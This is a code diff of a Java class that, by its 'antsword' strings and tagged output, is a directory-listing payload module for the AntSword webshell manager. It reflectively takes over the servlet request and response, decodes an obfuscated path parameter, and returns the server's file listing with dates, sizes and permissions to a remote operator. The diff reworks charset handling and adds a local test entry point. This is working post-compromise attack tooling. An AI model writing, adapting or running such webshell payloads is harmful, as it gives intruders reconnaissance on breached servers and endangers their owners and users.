@@ -1,16 +1,13 @@
+package filemanager;
+
 import javax.servlet.http.HttpServletRequest;
 import javax.servlet.http.HttpServletResponse;
 import java.io.ByteArrayOutputStream;
 import java.io.File;
 import java.lang.reflect.Field;
-import java.nio.file.Files;
-import java.nio.file.LinkOption;
-import java.nio.file.Path;
-import java.nio.file.Paths;
-import java.nio.file.attribute.PosixFileAttributes;
-import java.nio.file.attribute.PosixFilePermission;
+import java.nio.charset.Charset;
 import java.text.SimpleDateFormat;
-import java.util.Set;
+
 
 public class Dir {
     public HttpServletRequest request = null;
@@ -25,7 +22,7 @@ public class Dir {
             Class clazz = Class.forName("javax.servlet.jsp.PageContext");
             request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj);
             response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj);
-        } catch (Exception ex) {
+        } catch (Exception e) {
             if (obj instanceof HttpServletRequest) {
                 request = (HttpServletRequest) obj;
                 try {
@@ -35,54 +32,47 @@ public class Dir {
                     Field resp = request2.getClass().getDeclaredField("response");
                     resp.setAccessible(true);
                     response = (HttpServletResponse) resp.get(request2);
-                } catch (Exception e) {
-                    e.printStackTrace();
-                }
+                } catch (Exception ex) {
+                    try {
+                        response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj);
+                    } catch (Exception ignored) {
 
-            } else if (obj instanceof HttpServletResponse) {
-                response = (HttpServletResponse) obj;
-                try {
-                    Field resp = response.getClass().getDeclaredField("response");
-                    resp.setAccessible(true);
-                    HttpServletResponse response2 = (HttpServletResponse) resp.get(response);
-                    Field req = response2.getClass().getDeclaredField("request");
-                    req.setAccessible(true);
-                    request = (HttpServletRequest) req.get(response2);
-                } catch (Exception e) {
-                    e.printStackTrace();
+                    }
                 }
             }
         }
         randomPrefix = "antswordrandomPrefix";
         encoder = "base64";
-        cs = "antswordCharset";
+        cs = String.valueOf(Charset.forName(System.getProperty("sun.jnu.encoding")));
         StringBuffer output = new StringBuffer("");
-        StringBuffer sb = new StringBuffer("");
         String tag_s = "->|";
         String tag_e = "|<-";
         String varkey1 = "antswordargpath";
         try {
             response.setContentType("text/html");
-            request.setCharacterEncoding(cs);
-            response.setCharacterEncoding(cs);
-            String z1 = EC(decode(request.getParameter(varkey1) + ""));
-            output.append(tag_s);
-            sb.append(FileTreeCode(z1));
-            output.append(sb.toString());
-            output.append(tag_e);
-            response.getWriter().print(output.toString());
+            request.setCharacterEncoding(String.valueOf(cs));
+            response.setCharacterEncoding(String.valueOf(cs));
+            String z1 = decode(request.getParameter(varkey1));
+            output.append(FileTreeCode(z1));
         } catch (Exception e) {
-            sb.append("ERROR" + ":// " + e.toString());
+            output.append("ERROR:// " + e.toString());
+        }
+        try {
+            response.getWriter().print(tag_s + output.toString() + tag_e);
+        } catch (Exception ignored) {
         }
         return true;
     }
 
-    String EC(String s) throws Exception {
-        if (encoder.equals("hex")) return s;
-        return new String(s.getBytes(), cs);
+    public static void main(String[] args) throws Exception {
+        Dir dir = new Dir();
+        dir.cs = String.valueOf(Charset.forName(System.getProperty("sun.jnu.encoding")));
+        dir.encoder = "base64";
+        System.out.println(dir.cs);
+        System.out.println(dir.FileTreeCode(dir.decode("RDovMzYwx/22r7TzyqbEv8K8Lw==")));
     }
 
-    String decode(String str) throws Exception {
+    public String decode(String str) throws Exception {
         int prefixlen = 0;
         try {
             prefixlen = Integer.parseInt(randomPrefix);
@@ -102,42 +92,37 @@ public class Dir {
                 ss = ss + (hexString.indexOf(str.charAt(i)) << 4 | hexString.indexOf(str.charAt(i + 1))) + ",";
                 baos.write((hexString.indexOf(str.charAt(i)) << 4 | hexString.indexOf(str.charAt(i + 1))));
             }
-            return baos.toString("UTF-8");
+            return baos.toString(cs);
         } else if (encoder.equals("base64")) {
             byte[] bt = null;
-            String version = System.getProperty("java.version");
-            if (version.compareTo("1.9") >= 0) {
-                Class Base64 = Class.forName("java.util.Base64");
-                Object Decoder = Base64.getMethod("getDecoder", new Class[0]).invoke(Base64, new Object[]{});
-                bt = (byte[]) Decoder.getClass().getMethod("decode", String.class).invoke(Decoder, str);
-            } else {
-                Class Base64 = Class.forName("sun.misc.BASE64Decoder");
-                Object Decoder = Base64.getDeclaredConstructor().newInstance();
-                bt = (byte[]) Decoder.getClass().getMethod("decodeBuffer", String.class).invoke(Decoder, str);
+            try {
+                Class clazz = Class.forName("sun.misc.BASE64Decoder");
+                bt = (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
+            } catch (ClassNotFoundException e) {
+                Class clazz = Class.forName("java.util.Base64");
+                Object decoder = clazz.getMethod("getDecoder").invoke(null);
+                bt = (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
             }
-
-            return new String(bt, "UTF-8");
+            return new String(bt, cs);
         }
         return str;
     }
 
-    String FileTreeCode(String dirPath) throws Exception {
-        File oF = new File(dirPath), l[] = oF.listFiles();
+    public String FileTreeCode(String dirPath) throws Exception {
+        File oF = new File(dirPath);
+        File[] l = oF.listFiles();
         String s = "", sT, sQ, sF = "";
         java.util.Date dt;
-        String fileCode = (String) System.getProperties().get("file.encoding");
         SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
         for (int i = 0; i < l.length; i++) {
             dt = new java.util.Date(l[i].lastModified());
             sT = fm.format(dt);
-            if (isWin()) {
-                sQ = l[i].canRead() ? "R" : "-";
-                sQ += l[i].canWrite() ? "W" : "-";
-                sQ += l[i].canExecute() ? "X" : "-";
-            } else {
-                sQ = getPosixFilePermissions(l[i].toString());
-            }
-            String nm = new String(l[i].getName().getBytes(fileCode), cs);
+
+            sQ = l[i].canRead() ? "R" : "-";
+            sQ += l[i].canWrite() ? "W" : "-";
+            sQ += l[i].canExecute() ? "X" : "-";
+
+            String nm = l[i].getName();
             if (l[i].isDirectory()) {
                 s += nm + "/\t" + sT + "\t" + l[i].length() + "\t" + sQ + "\n";
             } else {
@@ -145,58 +130,6 @@ public class Dir {
             }
         }
         s += sF;
-        return new String(s.getBytes(fileCode), cs);
-    }
-
-    String getPosixFilePermissions(String sourceFile) {
-        int ownerPermissions = 0;
-        int groupPermissions = 0;
-        int othersPermissions = 0;
-        try {
-            Path path = Paths.get(sourceFile);
-            PosixFileAttributes attr;
-            attr = Files.readAttributes(path, PosixFileAttributes.class, LinkOption.NOFOLLOW_LINKS);
-            Set<PosixFilePermission> filePermissions = attr.permissions();
-
-            if (filePermissions.contains(PosixFilePermission.OWNER_READ)) {
-                ownerPermissions += 4;
-            }
-            if (filePermissions.contains(PosixFilePermission.OWNER_WRITE)) {
-                ownerPermissions += 2;
-            }
-            if (filePermissions.contains(PosixFilePermission.OWNER_EXECUTE)) {
-                ownerPermissions += 1;
-            }
-            if (filePermissions.contains(PosixFilePermission.GROUP_READ)) {
-                groupPermissions += 4;
-            }
-            if (filePermissions.contains(PosixFilePermission.GROUP_WRITE)) {
-                groupPermissions += 2;
-            }
-            if (filePermissions.contains(PosixFilePermission.GROUP_EXECUTE)) {
-                groupPermissions += 1;
-            }
-            if (filePermissions.contains(PosixFilePermission.OTHERS_READ)) {
-                othersPermissions += 4;
-            }
-            if (filePermissions.contains(PosixFilePermission.OTHERS_WRITE)) {
-                othersPermissions += 2;
-            }
-            if (filePermissions.contains(PosixFilePermission.OTHERS_EXECUTE)) {
-                othersPermissions += 1;
-            }
-        } catch (Exception ioe) {
-            return "0000";
-        }
-        return "0" + String.valueOf(ownerPermissions) + String.valueOf(groupPermissions)
-                + String.valueOf(othersPermissions);
-    }
-
-    boolean isWin() {
-        String osname = System.getProperty("os.name");
-        osname = osname.toLowerCase();
-        if (osname.startsWith("win"))
-            return true;
-        return false;
+        return s;
     }
 }
